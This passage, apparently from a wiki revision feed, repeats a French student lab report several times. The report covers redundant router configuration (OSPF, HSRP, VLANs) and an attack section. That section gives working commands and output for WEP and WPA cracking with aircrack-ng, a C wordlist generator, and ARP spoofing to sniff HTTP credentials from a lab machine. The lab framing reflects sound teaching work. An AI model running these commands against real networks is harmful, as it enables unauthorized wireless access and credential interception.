Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53958</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53958"/>
				<updated>2020-11-20T11:10:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
[pastabox.site]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53565</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53565"/>
				<updated>2020-11-13T09:41:17Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==attaque par homme du millieu==&lt;br /&gt;
&lt;br /&gt;
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites&lt;br /&gt;
&lt;br /&gt;
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : &lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques&lt;br /&gt;
&lt;br /&gt;
On modifie aussi les fichiers :&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/all/rp_filter&lt;br /&gt;
echo 0 &amp;gt; /proc/sys/net/ipv4/conf/default/rp_filter&lt;br /&gt;
&lt;br /&gt;
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :&lt;br /&gt;
 arpspoof -i bridge -t zabeth06 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.&lt;br /&gt;
&lt;br /&gt;
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.&lt;br /&gt;
&lt;br /&gt;
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : &amp;lt;/code&amp;gt;host zabeth06 and port http&amp;lt;/code&amp;gt;. On vois alors toutes les connections de zabeth06 vers des sites http.&lt;br /&gt;
&lt;br /&gt;
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes&lt;br /&gt;
&lt;br /&gt;
 Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n&lt;br /&gt;
   Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
   Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=instalation dns securisé=&lt;br /&gt;
&lt;br /&gt;
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53564</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53564"/>
				<updated>2020-11-13T09:39:54Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
